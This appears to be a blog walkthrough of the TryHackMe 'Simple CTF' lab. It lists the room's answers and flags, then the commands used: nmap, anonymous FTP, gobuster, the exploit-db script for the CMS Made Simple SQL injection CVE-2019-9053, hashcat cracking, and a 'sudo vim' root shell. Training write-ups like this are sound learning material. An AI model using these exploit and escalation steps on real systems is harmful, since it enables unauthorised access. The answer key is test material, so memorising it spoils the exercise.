Simple CTF - TryHackMe Problem Solving

 1. How many services are running under port 1000?

Ans: 2

2. What is running on the higher port?

Ans: ssh

3. What's the CVE you're using against the application? 

Ans: CVE-2019-9053

 4. To what kind of vulnerability is the application vulnerable?

Ans: sqli

5. What's the password?

Ans: secret

6. Where can you login with the details obtained?

Ans: ssh

7. What's the user flag?

Ans: G00d j0b, keep up!

8. Is there any other user in the home directory? What's its name?

Ans: sunbath

9. What can you leverage to spawn a privileged shell?

Ans: vim

10. What's the root flag?

Ans: W3ll d0n3. You made it!

==================Problem Solving Step ===========

1. First of all openvpn

2. Scan with nmap

cmd: nmap -A ip address

cmd: ftp ip address

cmd: anonymous

cmd: ls

cmd: cd pub

cmd: ls

cmd: mget *

then: y

cmd: bye

cmd: less ForMitch.txt

cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

get directory "simple"

3. Go to browser on ip/simple

Get cms version

4. Search google exploit-db website and find out cms version - type "cms made simple"

cmd:  pip3 install termcolor

cmd: python3 46635.py -u http:/ip/simple/

or cmd:

python3 46635.py -u http://10.10.230.104/simple/ --crack -w /usr/share/wordlists/rockyou.txt 

New cmd: hashcat -O -a 0 -m 20 hashPassword:sitPassword /usr/share/wordlists/rockyou.txt

Get Password

cmd: ssh mitch@ip -p port_number

input yes and password

cmd:ls

cmd: cat user.txt

cmd: bash

cmd: ls

cmd: cat user.txt

cmd: ls /home

Get "sunbath"

cmd: sudo -l

Get vim

5. Go to browser to "gtfobins" and find out vim and copy 

sudo vim -c ':!/bin/sh' "

mitch@Machine:~$

cmd: sudo vim -c ':!/bin/sh'

cmd: whoami

cmd: cd root

cmd: ls

cmd: cat root.txt

Comments

Popular posts from this blog

Pickle Rick - TryHackMe Problem Solving

Startup - TryHackMe Problem Solving

Tomghost - TryHackMe Problem Solving